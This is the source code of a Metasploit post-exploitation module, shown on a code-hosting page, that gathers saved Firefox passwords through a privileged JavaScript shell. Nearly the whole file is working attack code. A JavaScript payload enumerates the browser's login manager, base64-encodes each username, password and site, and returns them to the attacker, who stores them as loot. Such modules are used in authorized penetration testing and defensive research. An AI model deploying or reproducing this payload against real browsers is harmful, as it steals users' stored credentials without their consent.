Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/firefox/gather/passwords.rb
19515 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'json'
7
8
class MetasploitModule < Msf::Post
9
include Msf::Payload::Firefox
10
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Firefox Gather Passwords from Privileged JavaScript Shell',
17
'Description' => %q{
18
This module allows collection of passwords from a Firefox Privileged JavaScript Shell.
19
},
20
'License' => MSF_LICENSE,
21
'Author' => [ 'joev' ],
22
'DisclosureDate' => '2014-04-11',
23
'Notes' => {
24
'Stability' => [CRASH_SAFE],
25
'SideEffects' => [],
26
'Reliability' => []
27
}
28
)
29
)
30
31
register_options([
32
OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
33
])
34
end
35
36
def run
37
results = js_exec(js_payload)
38
if results.present?
39
begin
40
passwords = JSON.parse(results)
41
passwords.each do |entry|
42
entry.each_key { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
43
end
44
45
if !passwords.empty?
46
file = store_loot('firefox.passwords.json', 'text/json', rhost, passwords.to_json)
47
print_good("Saved #{passwords.length} passwords to #{file}")
48
else
49
print_warning('No passwords were found in Firefox.')
50
end
51
rescue JSON::ParserError
52
print_warning(results)
53
end
54
end
55
end
56
57
def js_payload
58
%|
59
(function(send){
60
try {
61
var manager = Components
62
.classes["@mozilla.org/login-manager;1"]
63
.getService(Components.interfaces.nsILoginManager);
64
var logins = manager.getAllLogins();
65
var passwords = [];
66
var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
67
var fields = ['password', 'passwordField', 'username', 'usernameField',
68
'httpRealm', 'formSubmitURL', 'hostname'];
69
70
var sanitize = function(passwdObj) {
71
var sanitized = { };
72
for (var i in fields) {
73
sanitized[fields[i]] = b64(passwdObj[fields[i]]);
74
}
75
return sanitized;
76
}
77
78
// Find user from returned array of nsILoginInfo objects
79
for (var i = 0; i < logins.length; i++) {
80
passwords.push(sanitize(logins[i]));
81
}
82
83
send(JSON.stringify(passwords));
84
} catch (e) {
85
send(e);
86
}
87
})(this.send);
88
|.strip
89
end
90
end
91
92